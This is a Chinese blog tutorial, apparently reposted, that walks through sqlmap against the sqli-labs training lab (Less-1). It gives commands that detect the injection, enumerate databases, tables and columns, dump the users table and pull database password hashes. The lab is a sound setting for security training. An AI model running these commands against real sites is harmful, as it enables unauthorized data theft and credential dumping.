sqlmap的使用之sql-lab

splmap的五种独特的sql注入技术:

基于布尔类型的盲注
基于时间的盲注
基于报错的盲注
联合查询注入
堆查询注入

在进行注入之前要说明两点:
第一我们在进行注入的时候需要把url中的127.0.0.1改为本机的ip
第二在注入的时候一定要带上参数。

接下来我们对sql-lab进行sqlmap使用:


0x01 Less-1


一、sqlmap.py -u http://192.168.83.129/sqli-labs-master/Less-1/?id=1
在这里插入图片描述it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes?y
看起来后端DBMS是“mysql”。是否要跳过特定于其他DBMS的测试有效负载?y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? y
对于其余的测试,是否要包括扩展提供的级别(1)和风险(1)值的“mysql”的所有测试? y
在这里插入图片描述从上图中可以看出:当前数据库位mysql数据库、存在布尔盲注、延时注入、联合查询、操作系统版本、等等。

二、查看当前用户下的数据库 sqlmap.py -u http://192.168.83.129/sqli-labs-master/Less-1/?id=1 --dbs

在这里插入图片描述三、获取数据库当中的表名 sqlmap.py -u http://192.168.83.129/sqli-labs-master/Less-1/?id=1 -D security --tables

在这里插入图片描述四、获取表中的字段 sqlmap.py -u http://192.168.83.129/sqli-labs-master/Less-1/?id=1 -D security -T users --columns在这里插入图片描述五、爆出字段
–dump -T “数据库” -D “表” -C “字段” #列出指定数据库的表的字段的数据
sqlmap.py -u http://192.168.83.129/sqli-labs-master/Less-1/?id=1 --dump -D security -T users --columns
在这里插入图片描述

扩展:

列出当前数据库的所有用户:(前提是你有权限读取包含所有用户表)
sqlmap.py -u http://192.168.83.129/sqli-labs-master/Less-1/?id=1 --users
在这里插入图片描述
列出数据库的用户密码:前提是用户有权限读取数据库的密码。sqlmap会先列举出用户,然后在列举出密码的hash值。
sqlmap.py -u http://192.168.83.129/sqli-labs-master/Less-1/?id=1 --password

在这里插入图片描述获得当前数据库的名称:
sqlmap.py -u “http://192.168.83.129/sqli-labs-master/Less-1/?id=1” --current-db
在这里插入图片描述获取当前数据库用户名称:
sqlmap.py -u “http://192.168.83.129/sqli-labs-master/Less-1/?id=1” --current-user
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_43803070/article/details/89945950